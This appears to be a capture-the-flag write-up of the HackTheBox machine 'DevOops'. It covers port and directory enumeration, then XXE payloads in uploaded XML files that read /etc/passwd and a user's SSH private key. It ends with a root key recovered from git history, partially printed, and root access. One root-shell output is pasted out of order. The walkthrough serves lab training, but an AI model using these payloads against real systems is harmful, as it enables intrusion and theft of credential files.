DevOops

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.91 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:47 CET
Nmap scan report for 10.10.10.91
Host is up (0.058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,5000 10.10.10.91 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:49 CET
Nmap scan report for 10.10.10.91
Host is up (0.045s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4290e335318d8b86172afb3890dac495 (RSA)
|   256 b7b6dcc44c879b752a008983edb28031 (ECDSA)
|_  256 d52f1953b28e3a4bb3dd3c1fc0370d00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: gunicorn/19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds

Website on port 5000 shows an Under construction! page.

Let's try to see if there are any subdirectories or hidden files.

gobuster dir -u http://10.10.10.91:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.91:5000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/11/21 18:53:24 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 200) [Size: 347]
/feed                 (Status: 200) [Size: 546263]
/newpost              (Status: 405) [Size: 178]
===============================================================
2022/11/21 18:59:29 Finished
===============================================================

Exploitation

The /upload directory allow us to upload XML files with the Author, Subject and Content attributes.

Let's try to upload the test.xml file with the following XML code.

<item>
<Author>alfa8sa</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>

The file was uploaded successfully. As the values of the attributes are shown in the page, we could try to exploit an XXE to get an LFI. The following code will create an XML Entity which will load the /etc/passwd file, then show the content in the Author attribute.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>

There is one user called roosa. Let's try to get her id_rsa key.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>

Now, let's create an id_rsa file with that key, give it the right permissions, and log is as the roosa user. Then we could grab the user flag.

nano id_rsa

chmod 600 id_rsa

ssh -i is_rsa roosa@10.10.10.91

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# whoami
root
root@devoops:~# cat root.txt 
c5948adaf05042ec3d6c98f864440e4a
root@devoops:~# exit
logout
Connection to localhost closed.
roosa@devoops:~/work/blogfeed$ exit
logout
Connection to 10.10.10.91 closed.
❯ ssh -i id_rsa roosa@10.10.10.91
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 13:20:06 2022 from 10.10.14.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt 
488649de359589f7fe73a164c95f5d75

Privilege Escalation

If we search for any git projects, we'll find one in /home/roosa/work/blogfeed/.

find / -name "*.git" 2>/dev/null

/srv/git/blogfeed.git
/home/roosa/work/blogfeed/.git

If we check the git log, we'll see one commit with the reverted accidental commit with proper key comment.

cd /home/roosa/work/blogfeed/

git log

...
commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key
...

If we check the content of the commit, we'll see two private SSH keys.

git show 33e87c312c08735a02fa9c796021a4a3023129ad

 -----BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
-8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
+T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
+bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
 -----END RSA PRIVATE KEY-----

Let's try to log in as root with the first one.

nano /tmp/id_rsa

chmod 600 /tmp/id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----

We'll see that the key is valid, and then all we have to do is reap the harvest and take the root flag.

ssh -i /tmp/id_rsa root@localhost

Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 14:18:45 2022 from 127.0.0.1
root@devoops:~# whoami
root
root@devoops:~# cat root.txt 
c5948adaf05042ec3d6c98f864440e4a